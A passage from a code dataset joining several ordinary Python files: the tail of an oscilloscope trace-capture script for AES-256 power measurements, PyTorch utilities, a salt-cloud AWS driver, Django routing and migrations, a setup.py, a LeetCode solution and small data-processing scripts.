encode_hex(h.read(16))[0].decode('utf-8')\n    pico.waitForTrigger()\n    trace_A[i] = pico.getChannelValues('A')\n\n    # Save info of time\n    if i == 1:\n        samplingParameters = pico.getSamplingParameters()\n        noSamples = samplingParameters['noSamples']\n        samplingPeriod_ns = samplingParameters['samplingPeriod_ns']\n        timeVector = np.linspace(0, noSamples * samplingPeriod_ns, noSamples)\n        with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/time.txt', \"wt\") as f:\n            for x in timeVector:\n                f.write(str(x) + ' ')\n            f.write('\\n')\n\n    print(str(i + 1) + \"/\" + str(n_traces) + \" Capturing Traces ...\")\n    i = i + 1\n\n    pico.run()\n\n    # Save traces in file\n    if i == 1000:\n        with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/traces.txt', \"wt\") as f:\n            for x in trace_A:\n                for elem in 
x:\n f.write(str(elem) + ' ')\n f.write('\\n')\n if i == n_traces:\n with open('../../Data/AES_256/Measurement_' + str(Nth_measurement) + '/traces.txt', \"wt\") as f:\n for x in trace_A:\n for elem in x:\n f.write(str(elem) + ' ')\n f.write('\\n')\n\n\npico.stop()\nprint(\"Success\")","sub_path":"Communication pico&sakura (Python)/Collect_traces/Collect_traces_Faking_implemented.py","file_name":"Collect_traces_Faking_implemented.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647536821","text":"from torch import nn\r\nimport torch.nn.functional as F\r\nimport torch\r\nfrom sync_batchnorm import SynchronizedBatchNorm2d as BatchNorm2d\r\nfrom sync_batchnorm import SynchronizedBatchNorm3d as BatchNorm3d\r\n\r\n\r\ndef kp2gaussian(kp: object, spatial_size: object, kp_variance: object) -> object:\r\n \"\"\"\r\n Transform a keypoint into gaussian like representation\r\n \"\"\"\r\n mean = kp['value']\r\n\r\n coordinate_grid = make_coordinate_grid(spatial_size, mean.type())\r\n number_of_leading_dimensions = len(mean.shape) - 1\r\n shape = (1,) * number_of_leading_dimensions + coordinate_grid.shape\r\n coordinate_grid = coordinate_grid.view(*shape)\r\n repeats = mean.shape[:number_of_leading_dimensions] + (1, 1, 1)\r\n coordinate_grid = coordinate_grid.repeat(*repeats)\r\n\r\n # Preprocess kp shape\r\n shape = mean.shape[:number_of_leading_dimensions] + (1, 1, 2)\r\n mean = mean.view(*shape)\r\n\r\n mean_sub = (coordinate_grid - mean)\r\n\r\n out = torch.exp(-0.5 * (mean_sub ** 2).sum(-1) / kp_variance)\r\n\r\n return out\r\n\r\n\r\ndef make_coordinate_grid(spatial_size, type):\r\n \"\"\"\r\n Create a meshgrid [-1,1] x [-1,1] of given spatial_size.\r\n \"\"\"\r\n h, w = spatial_size\r\n x = torch.arange(w).type(type)\r\n y = torch.arange(h).type(type)\r\n\r\n x = (2 * (x / (w - 1)) - 1)\r\n y = (2 * (y / (h - 1)) - 1)\r\n\r\n yy = y.view(-1, 1).repeat(1, w)\r\n xx = x.view(1, -1).repeat(h, 1)\r\n\r\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\r\n\r\n return meshed\r\n\r\n\r\ndef zip_dimT_to_dimBS(tensor):\r\n \"\"\"\r\n :param tensor: (N)D tensor: B, C, T, ...\r\n :return: tensor_: (N-1)D tensor: B * T, C, ...\r\n \"\"\"\r\n\r\n shape = tensor.shape\r\n tensor_ = tensor.transpose(1, 2).contiguous().view([shape[0] * shape[2], shape[1]] + list(shape[3:])).contiguous()\r\n return tensor_\r\n\r\n\r\ndef unzip_dimT_from_dimBS(num_frame, tensor):\r\n \"\"\"\r\n :param num_frame: number of dimT\r\n :param tensor: (N-1)D tensor: B * T, C, ...\r\n :return: tensor_: (N)D tensor: B, C, T, ...\r\n \"\"\"\r\n shape = tensor.shape\r\n tensor_ = tensor.view([-1, num_frame, shape[1]] + list(shape[2:])).contiguous().transpose(1, 2).contiguous()\r\n return tensor_\r\n\r\n\r\ndef SoftCrossEntropyLoss(inputs, target, temperature=0.1):\r\n log_likelihood = -F.log_softmax(inputs / temperature, dim=1)\r\n prob_target = F.softmax(target / temperature, dim=1)\r\n loss = torch.mul(log_likelihood, prob_target).sum(dim=1).mean()\r\n return loss\r\n\r\n\r\ndef MatrixEqualityLoss(inputs, target):\r\n eye_ = torch.matmul(inputs, torch.inverse(target))\r\n eye = torch.eye(2).view(1, 1, 2, 2).type(eye_.type())\r\n loss = torch.abs(eye - eye_).sum(dim=(1, 3, 4)).mean()\r\n\r\n return loss\r\n\r\n\r\nclass ResBlock3d(nn.Module):\r\n \"\"\"\r\n Res block, preserve spatial resolution.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, kernel_size, padding):\r\n super(ResBlock3d, self).__init__()\r\n if 
isinstance(padding, int):\r\n padding = (padding, padding, padding)\r\n self.conv1 = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]))\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]))\r\n )\r\n self.norm1 = BatchNorm3d(in_features, affine=True)\r\n self.norm2 = BatchNorm3d(in_features, affine=True)\r\n\r\n def forward(self, x):\r\n out = self.norm1(x)\r\n out = F.relu(out, inplace=True)\r\n out = self.conv1(out)\r\n out = self.norm2(out)\r\n out = F.relu(out, inplace=True)\r\n out = self.conv2(out)\r\n out += x\r\n return out\r\n\r\n\r\nclass UpBlock2d(nn.Module):\r\n \"\"\"\r\n Upsampling block for use in decoder(2D).\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(UpBlock2d, self).__init__()\r\n\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, affine=True)\r\n\r\n def forward(self, x):\r\n out = F.interpolate(x, scale_factor=2)\r\n out = self.conv(out)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n return out\r\n\r\n\r\nclass UpBlock3d(nn.Module):\r\n \"\"\"\r\n Upsampling block for use in decoder.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(UpBlock3d, self).__init__()\r\n\r\n if isinstance(padding, int):\r\n padding = (padding, padding, padding)\r\n self.conv = nn.Sequential(\r\n nn.ReplicationPad3d((0, 0, 0, 0, padding[0], padding[0])),\r\n nn.Conv3d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=(0, padding[1], padding[2]), groups=groups)\r\n )\r\n self.norm = BatchNorm3d(out_features, affine=True)\r\n\r\n def forward(self, x):\r\n shape = x.shape\r\n x = x.transpose(1, 2).contiguous().view([shape[0] * shape[2], shape[1]] + list(shape[3:]))\r\n out = F.interpolate(x, scale_factor=2)\r\n out = out.view([shape[0], shape[2], shape[1]] + list(out.shape[2:])).contiguous().transpose(1, 2)\r\n out = self.conv(out)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n return out\r\n\r\n\r\nclass DownBlock2d(nn.Module):\r\n \"\"\"\r\n Downsampling block for use in encoder(2D).\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\r\n super(DownBlock2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\r\n padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, affine=True)\r\n self.pool = nn.AvgPool2d(kernel_size=(2, 2))\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = self.norm(out)\r\n out = F.relu(out, inplace=True)\r\n out = self.pool(out)\r\n return out\r\n\r\n\r\nclass SameBlock2d(nn.Module):\r\n \"\"\"\r\n Simple block, preserve spatial resolution.\r\n \"\"\"\r\n\r\n def __init__(self, in_features, out_features, groups=1, kernel_size=3, padding=1):\r\n super(SameBlock2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features,\r\n kernel_size=kernel_size, padding=padding, groups=groups)\r\n self.norm = BatchNorm2d(out_features, 
affine=True)\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = self.norm(out)\r\n out = F.relu(out)\r\n return out\r\n\r\n\r\nclass Decoder3d(nn.Module):\r\n \"\"\"\r\n Hourglass Decoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Decoder3d, self).__init__()\r\n\r\n up_blocks = []\r\n\r\n for i in range(num_blocks)[::-1]:\r\n in_filters = (1 if i == num_blocks - 1 else 2) * min(max_features, block_expansion * (2 ** (i + 1)))\r\n out_filters = min(max_features, block_expansion * (2 ** i))\r\n up_blocks.append(UpBlock3d(in_filters, out_filters, kernel_size=3, padding=1))\r\n\r\n self.up_blocks = nn.ModuleList(up_blocks)\r\n self.out_filters = block_expansion + in_features\r\n\r\n def forward(self, x):\r\n out = x.pop()\r\n for up_block in self.up_blocks:\r\n out = up_block(out)\r\n skip = x.pop()\r\n out = torch.cat([out, skip], dim=1)\r\n return out\r\n\r\n\r\nclass Encoder2d(nn.Module):\r\n \"\"\"\r\n Hourglass Encoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Encoder2d, self).__init__()\r\n\r\n down_blocks = []\r\n for i in range(num_blocks):\r\n down_blocks.append(DownBlock2d(in_features if i == 0 else min(max_features, block_expansion * (2 ** i)),\r\n min(max_features, block_expansion * (2 ** (i + 1))),\r\n kernel_size=3, padding=1))\r\n self.down_blocks = nn.ModuleList(down_blocks)\r\n\r\n def forward(self, x):\r\n outs = [x]\r\n for down_block in self.down_blocks:\r\n outs.append(down_block(outs[-1]))\r\n return outs\r\n\r\n\r\nclass Decoder2d(nn.Module):\r\n \"\"\"\r\n Hourglass Decoder\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Decoder2d, self).__init__()\r\n\r\n up_blocks = []\r\n\r\n for i in range(num_blocks)[::-1]:\r\n in_filters = (1 if i == num_blocks - 1 else 2) * min(max_features, block_expansion * (2 ** (i + 1)))\r\n out_filters = min(max_features, block_expansion * (2 ** i))\r\n up_blocks.append(UpBlock2d(in_filters, out_filters, kernel_size=3, padding=1))\r\n\r\n self.up_blocks = nn.ModuleList(up_blocks)\r\n self.out_filters = block_expansion + in_features\r\n\r\n def forward(self, x):\r\n out = x.pop()\r\n for up_block in self.up_blocks:\r\n out = up_block(out)\r\n skip = x.pop()\r\n out = torch.cat([out, skip], dim=1)\r\n return out\r\n\r\n\r\nclass Hourglass2d(nn.Module):\r\n \"\"\"\r\n Hourglass architecture.\r\n \"\"\"\r\n\r\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\r\n super(Hourglass2d, self).__init__()\r\n self.encoder = Encoder2d(block_expansion, in_features, num_blocks, max_features)\r\n self.decoder = Decoder2d(block_expansion, in_features, num_blocks, max_features)\r\n self.out_filters = self.decoder.out_filters\r\n\r\n def forward(self, x):\r\n return self.decoder(self.encoder(x))\r\n\r\n\r\nclass AntiAliasInterpolation2d(nn.Module):\r\n \"\"\"\r\n Band-limited downsampling, for better preservation of the input signal.\r\n \"\"\"\r\n def __init__(self, channels, scale):\r\n super(AntiAliasInterpolation2d, self).__init__()\r\n sigma = (1 / scale - 1) / 2\r\n kernel_size = 2 * round(sigma * 4) + 1\r\n self.ka = kernel_size // 2\r\n self.kb = self.ka - 1 if kernel_size % 2 == 0 else self.ka\r\n\r\n kernel_size = [kernel_size, kernel_size]\r\n sigma = [sigma, sigma]\r\n # The gaussian kernel is the product of the\r\n # gaussian function of each dimension.\r\n kernel = 1\r\n meshgrids = torch.meshgrid(\r\n 
[\r\n torch.arange(size, dtype=torch.float32)\r\n for size in kernel_size\r\n ]\r\n )\r\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\r\n mean = (size - 1) / 2\r\n kernel *= torch.exp(-(mgrid - mean) ** 2 / (2 * std ** 2))\r\n\r\n # Make sure sum of values in gaussian kernel equals 1.\r\n kernel = kernel / torch.sum(kernel)\r\n # Reshape to depthwise convolutional weight\r\n kernel = kernel.view(1, 1, *kernel.size())\r\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\r\n\r\n self.register_buffer('weight', kernel)\r\n self.groups = channels\r\n self.scale = scale\r\n\r\n def forward(self, input):\r\n if self.scale == 1.0:\r\n return input\r\n\r\n out = F.pad(input, (self.ka, self.kb, self.ka, self.kb))\r\n out = F.conv2d(out, weight=self.weight, groups=self.groups)\r\n out = F.interpolate(out, scale_factor=(self.scale, self.scale))\r\n\r\n return out\r\n","sub_path":"modules/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":11776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133879936","text":"'''\nThe AWS Cloud Module\n====================\n\nThe AWS cloud module is used to interact with the Amazon Web Services system.\n\nTo use the AWS cloud module the following configuration parameters need to be\nset in the main cloud config:\n\n.. code-block:: yaml\n\n # The AWS API authentication id\n AWS.id: GKTADJGHEIQSXMKKRBJ08H\n # The AWS API authentication key\n AWS.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs\n # The ssh keyname to use\n AWS.keyname: default\n # The amazon security group\n AWS.securitygroup: ssh_open\n # The location of the private key which corresponds to the keyname\n AWS.private_key: /root/default.pem\n\n'''\n\n# Import python libs\nimport os\nimport sys\nimport types\nimport time\nimport tempfile\nimport subprocess\nimport logging\n\n# Import libcloud\nfrom libcloud.compute.types import Provider\nfrom libcloud.compute.providers import get_driver\nfrom libcloud.compute.deployment import MultiStepDeployment, ScriptDeployment, SSHKeyDeployment\n\n# Import saltcloud libs\nimport saltcloud.utils\nfrom saltcloud.utils import namespaced_function\nfrom saltcloud.libcloudfuncs import *\n\n# Import salt libs\nfrom salt.exceptions import SaltException\n\n# Get logging started\nlog = logging.getLogger(__name__)\n\n# Init the libcloud functions\navail_images = namespaced_function(avail_images, globals())\navail_sizes = namespaced_function(avail_sizes, globals())\nscript = namespaced_function(script, globals())\ndestroy = namespaced_function(destroy, globals())\nlist_nodes = namespaced_function(list_nodes, globals())\nlist_nodes_full = namespaced_function(list_nodes_full, globals())\nlist_nodes_select = namespaced_function(list_nodes_select, globals())\n\n\n# Only load in this module if the AWS configurations are in place\ndef __virtual__():\n '''\n Set up the libcloud funcstions and check for AWS configs\n '''\n confs = [\n 'AWS.id',\n 'AWS.key',\n 'AWS.keyname',\n 'AWS.securitygroup',\n 'AWS.private_key',\n ]\n for conf in confs:\n if conf not in __opts__:\n return False\n log.debug('Loading AWS cloud module')\n return 'aws'\n\n\nEC2_LOCATIONS = {\n 'ap-northeast-1': Provider.EC2_AP_NORTHEAST,\n 'ap-southeast-1': Provider.EC2_AP_SOUTHEAST,\n 'eu-west-1': Provider.EC2_EU_WEST,\n 'sa-east-1': Provider.EC2_SA_EAST,\n 'us-east-1': Provider.EC2_US_EAST,\n 'us-west-1': Provider.EC2_US_WEST,\n 'us-west-2': Provider.EC2_US_WEST_OREGON\n}\nDEFAULT_LOCATION = 'us-east-1'\n\nif 
hasattr(Provider, 'EC2_AP_SOUTHEAST2'):\n EC2_LOCATIONS['ap-southeast-2'] = Provider.EC2_AP_SOUTHEAST2\n\n\ndef get_conn(**kwargs):\n '''\n Return a conn object for the passed VM data\n '''\n if 'location' in kwargs:\n location = kwargs['location']\n if location not in EC2_LOCATIONS:\n raise SaltException('The specified location does not seem to be valid: {0}\\n'.format(location))\n else:\n location = DEFAULT_LOCATION\n\n driver = get_driver(EC2_LOCATIONS[location])\n return driver(\n __opts__['AWS.id'],\n __opts__['AWS.key'],\n )\n\n\ndef keyname(vm_):\n '''\n Return the keyname\n '''\n return str(vm_.get('keyname', __opts__.get('AWS.keyname', '')))\n\n\ndef securitygroup(vm_):\n '''\n Return the security group(s), normalized to a list\n '''\n securitygroups = vm_.get('securitygroup', __opts__.get('AWS.securitygroup', 'default'))\n if not isinstance(securitygroups, list):\n securitygroups = [securitygroups]\n return securitygroups\n\n\ndef ssh_username(vm_):\n '''\n Return the ssh_username. Defaults to 'ec2-user'.\n '''\n usernames = vm_.get('ssh_username', __opts__.get('AWS.ssh_username', 'ec2-user'))\n if not isinstance(usernames, list):\n usernames = [usernames]\n if 'ec2-user' not in usernames:\n usernames.append('ec2-user')\n if 'root' not in usernames:\n usernames.append('root')\n return usernames\n\n\ndef ssh_interface(vm_):\n '''\n Return the ssh_interface type to connect to. Either 'public_ips' (default) or 'private_ips'.\n '''\n return vm_.get('ssh_interface', __opts__.get('AWS.ssh_interface', 'public_ips'))\n\n\ndef get_location(vm_):\n '''\n Return the AWS region to use\n '''\n return vm_.get('location', __opts__.get('AWS.location', DEFAULT_LOCATION))\n\n\ndef get_availability_zone(conn, vm_):\n '''\n Return the availability zone to use\n '''\n locations = conn.list_locations()\n az = None\n if 'availability_zone' in vm_:\n az = vm_['availability_zone']\n elif 'AWS.availability_zone' in __opts__:\n az = __opts__['AWS.availability_zone']\n\n if az is None:\n # Default to first zone\n return locations[0]\n for loc in locations:\n if loc.availability_zone.name == az:\n return loc\n\n\ndef create(vm_):\n '''\n Create a single VM from a data dict\n '''\n location = get_location(vm_)\n log.info('Creating Cloud VM {0} in {1}'.format(vm_['name'], location))\n conn = get_conn(location=location)\n usernames = ssh_username(vm_)\n kwargs = {'ssh_key': __opts__['AWS.private_key']}\n kwargs['name'] = vm_['name']\n deploy_script = script(vm_)\n kwargs['image'] = get_image(conn, vm_)\n kwargs['size'] = get_size(conn, vm_)\n kwargs['location'] = get_availability_zone(conn, vm_)\n ex_keyname = keyname(vm_)\n if ex_keyname:\n kwargs['ex_keyname'] = ex_keyname\n ex_securitygroup = securitygroup(vm_)\n if ex_securitygroup:\n kwargs['ex_securitygroup'] = ex_securitygroup\n try:\n data = conn.create_node(**kwargs)\n except Exception as exc:\n err = ('Error creating {0} on AWS\\n\\n'\n 'The following exception was thrown by libcloud when trying to '\n 'run the initial deployment: \\n{1}').format(\n vm_['name'], exc\n )\n sys.stderr.write(err)\n log.error(err)\n return False\n log.info('Created node {0}'.format(vm_['name']))\n waiting_for_ip = 0\n while not data.public_ips:\n time.sleep(0.5)\n waiting_for_ip += 1\n data = get_node(conn, vm_['name'])\n log.warn('Salt node waiting_for_ip {0}'.format(waiting_for_ip))\n if ssh_interface(vm_) == \"private_ips\":\n log.info('Salt node data. 
Private_ip: {0}'.format(data.private_ips[0]))\n ip_address = data.private_ips[0]\n else:\n log.info('Salt node data. Public_ip: {0}'.format(data.public_ips[0]))\n ip_address = data.public_ips[0]\n if saltcloud.utils.wait_for_ssh(ip_address):\n for user in usernames:\n if saltcloud.utils.wait_for_passwd(host=ip_address, username=user, timeout=60, key_filename=__opts__['AWS.private_key']):\n username = user\n break\n if __opts__['deploy'] is True:\n deploy_command = 'bash /tmp/deploy.sh'\n if username == 'root':\n deploy_command = '/tmp/deploy.sh'\n deployed = saltcloud.utils.deploy_script(\n host=ip_address,\n username=username,\n key_filename=__opts__['AWS.private_key'],\n deploy_command=deploy_command,\n tty=True,\n script=deploy_script.script,\n name=vm_['name'],\n sudo=True,\n start_action=__opts__['start_action'],\n conf_file=__opts__['conf_file'],\n sock_dir=__opts__['sock_dir'])\n if deployed:\n log.info('Salt installed on {0}'.format(vm_['name']))\n else:\n log.error('Failed to start Salt on Cloud VM {0}'.format(vm_['name']))\n\n log.info('Created Cloud VM {0} with the following values:'.format(vm_['name']))\n for key, val in data.__dict__.items():\n log.info(' {0}: {1}'.format(key, val))\n volumes = vm_.get('map_volumes')\n if volumes:\n log.info('Create and attach volumes to node {0}'.format(data.name))\n create_attach_volumes(volumes,location, data)\n\n\ndef create_attach_volumes(volumes, location, data):\n '''\n Create and attach volumes to created node\n '''\n conn = get_conn(location=location)\n node_avz = data.__dict__.get('extra').get('availability')\n for avz in conn.list_locations():\n if avz.availability_zone.name == node_avz:\n break\n for volume in volumes:\n volume_name = volume['device'] + \" on \" + data.name\n created_volume = conn.create_volume(volume['size'], volume_name, avz)\n attach = conn.attach_volume(data, created_volume, volume['device'])\n if attach:\n log.info('{0} attached to {1} (aka {2}) as device {3}'.format(created_volume.id, data.id, data.name, volume['device']))\n\n\ndef stop(name):\n '''\n Stop a node\n '''\n conn = get_conn()\n node = get_node(conn, name)\n try:\n data = conn.ex_stop_node(node=node)\n log.debug(data)\n log.info('Stopped node {0}'.format(name))\n except Exception as exc:\n log.error('Failed to stop node {0}'.format(name))\n log.error(exc)\n\n\ndef start(name):\n '''\n Start a node\n '''\n conn = get_conn()\n node = get_node(conn, name)\n try:\n data = conn.ex_start_node(node=node)\n log.debug(data)\n log.info('Started node {0}'.format(name))\n except Exception as exc:\n log.error('Failed to start node {0}'.format(name))\n log.error(exc)\n\n","sub_path":"saltcloud/clouds/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":9466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634768045","text":"from django.urls import path\nfrom .views import RegistrationAPIView, LoginAPIView, UserRetrieveUpdateAPIView\n\napp_name='auth'\n\nurlpatterns = [\n path('user/', UserRetrieveUpdateAPIView.as_view(), name='retrieveUpdate'),\n path('users/', RegistrationAPIView.as_view(), name='registration'),\n path('users/login/', LoginAPIView.as_view(), name='login'),\n]","sub_path":"ratebum/apps/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395177458","text":"#! 
python3\nimport os\nfrom setuptools import setup, find_packages\n\n# read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md')) as f:\n long_description = f.read()\n\nsetup (\n\tname = \"extractor_phone_email\",\n\tversion = \"1.0.3\", \n\tdescription = \"Package that allows, with regular expressions, to extract from texts, phone numbers and emails\",\n\tlong_description = long_description,\n\tlong_description_content_type = \"text/markdown\",\n\tauthor = \"Dari Developer\",\n\tauthor_email = \"hernandezdarifrancisco@gmail.com\",\n\tlicense = \"MIT\",\n\tkeywords = \"extract, re, phones, emails\",\n\tproject_urls = {\n\t\t\"Documentation\": \"https://github.com/DariHernandez/phone_and_email_extractor/blob/master/README.md\",\n\t\t\"Funding\": \"https://www.paypal.com/paypalme/FranciscoDari\",\n\t\t\"Source\": \"https://github.com/DariHernandez/phone_and_email_extractor\"\n\t\t},\n\tpackages = find_packages(include=[\"extractor_phone_email\", \"extractor_phone_email.*\"]),\n\tinstall_requires = [\"pyperclip\"],\n\tpython_requires = \">=3.7\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190829224","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport mptt.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contents', '0001_initial'),\n ('templates', '0001_initial'),\n ('news', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('slug', models.SlugField(unique=True)),\n ('menu_depth', models.PositiveSmallIntegerField(default=0)),\n ],\n options={\n 'ordering': ['slug'],\n 'db_table': 'menus',\n },\n ),\n migrations.CreateModel(\n name='Page',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('slug', models.SlugField(unique=True)),\n ('is_active', models.BooleanField(default=True)),\n ('show_breadcrumbs', models.BooleanField(default=True)),\n ('position', models.PositiveSmallIntegerField(default=0, blank=True)),\n ('redirect_link', models.CharField(max_length=255, null=True, blank=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('category_link', models.ForeignKey(related_name='page_category', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='news.Category', null=True)),\n ('content_link', models.ForeignKey(related_name='page_content', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='contents.Content', null=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='pages.Page', null=True)),\n ('template', models.ForeignKey(blank=True, to='templates.Template', null=True)),\n ],\n options={\n 'ordering': ['position', 'title'],\n 'db_table': 'pages',\n },\n ),\n migrations.AddField(\n model_name='menu',\n name='pages',\n field=models.ManyToManyField(related_name='pages_menu', 
to='pages.Page', blank=True),\n ),\n ]\n","sub_path":"apps/pages/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60664677","text":"\n\nfrom xai.brain.wordbase.verbs._contain import _CONTAIN\n\n# class header\nclass _CONTAINED(_CONTAIN):\n\tdef __init__(self):\n\t\t_CONTAIN.__init__(self)\n\t\tself.name = \"CONTAINED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"contain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_contained.py","file_name":"_contained.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526018672","text":"class Solution:\r\n def productExceptSelf(self, nums: List[int]) -> List[int]:\r\n leftarr = [0]*len(nums)\r\n lproduct = 1\r\n rproduct = 1\r\n for i in range(len(nums)):\r\n if i>=1:\r\n lproduct *= nums[i-1]\r\n leftarr[i]=lproduct\r\n for i in range(len(nums)-1, -1,-1):\r\n if i<=len(nums)-2:\r\n rproduct *= nums[i+1]\r\n leftarr[i]*=rproduct\r\n return leftarr\r\n\r\n\"\"\"Time complexity: O(n)\r\nSpace complexity: O(1), since the array used for the calculation is returned as the output\r\nand is therefore not counted as auxiliary space\"\"\"\r\n\r\n # arr = []\r\n # for i in range(len(nums)):\r\n # product = 1\r\n # for j in range(len(nums)):\r\n # if i!=j:\r\n # product *=nums[j]\r\n # arr.append(product)\r\n # return arr\r\n \r\n # leftarr= [0]*len(nums)\r\n # rightarr=[0]*len(nums)\r\n # lproduct = 1\r\n # rproduct = 1\r\n # for i in range(len(nums)):\r\n # if i>=1:\r\n # lproduct *= nums[i-1]\r\n # leftarr[i]=lproduct\r\n # for i in range(len(nums)-1, -1,-1):\r\n # if i<=len(nums)-2:\r\n # rproduct *= nums[i+1]\r\n # rightarr[i]=rproduct\r\n # for i in range(len(nums)):\r\n # rightarr[i]*=leftarr[i]\r\n # return rightarr\r\n","sub_path":"ProductexceptSelf.py","file_name":"ProductexceptSelf.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17055404","text":"#!/usr/bin/env python\r\n#\r\n# File Name: filter_papers.py\r\n# Author: Evan Pete Walsh\r\n# Contact: epwalsh@iastate.edu\r\n# Creation Date: 02-02-2016\r\n# Last Modified: Mon Feb 15 17:30:04 2016\r\n# =============================================================================\r\n\r\n\"\"\" Remove papers that describe multiple studies and create master key with\r\nclassification of experimental design for all papers in 'clean' folder. 
\"\"\"\r\n\r\nimport pandas as pd\r\nimport os\r\nimport re\r\n\r\n\r\ndef change_suffix(s):\r\n res = re.sub(r\"\\.pdf\", \".txt\", s)\r\n return res\r\n\r\n# Remove papers with multiple studies\r\ndf = pd.read_csv(\"~/AFLEX/master_key/papers_with_multiple_studies.csv\")\r\ndf['File'] = df['File Name'].map(lambda x: change_suffix(x))\r\n\r\npath = \"/Users/epwalsh/AFLEX/papers/clean/\"\r\n\r\nfor f in df['File']:\r\n if os.path.isfile(path + f):\r\n os.remove(path + f)\r\n\r\n\r\n# Create classification list\r\nkey = pd.read_csv(\"~/AFLEX/master_key/master_key02.csv\")\r\nkey['File'] = key['File Name'].map(lambda x: change_suffix(x))\r\nkey = key.drop(['File Name'], axis=1)\r\n\r\nhome = os.path.expanduser('~')\r\npapers_dir = home + '/AFLEX/papers/clean/'\r\nfiles = [f for f in os.listdir(papers_dir) if\r\n os.path.isfile(os.path.join(papers_dir, f))]\r\n\r\nkey2 = pd.DataFrame(columns=['File'])\r\nkey2['File'] = files\r\n\r\nkey3 = pd.merge(key2, key, on='File', how='left')\r\nkey3.fillna(value='other', inplace=True)\r\nkey3.to_csv(\"response.csv\", index=False)\r\n","sub_path":"baseline/02_filter_papers.py","file_name":"02_filter_papers.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78329791","text":"'''\nauthor: HAK\ntime : 10:00 PM, 28/10/2017\n'''\n\nimport argparse\nimport re\nfrom directoryInfo import PATH_INFO_PROVIDER\nfrom Watch import Watcher\n\n\nparser = argparse.ArgumentParser(prog='WATCHER',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Watch directory with a path specified.')\nparser.add_argument('--path' , '-p', type=str, default='.', help=\"Specify full path to a 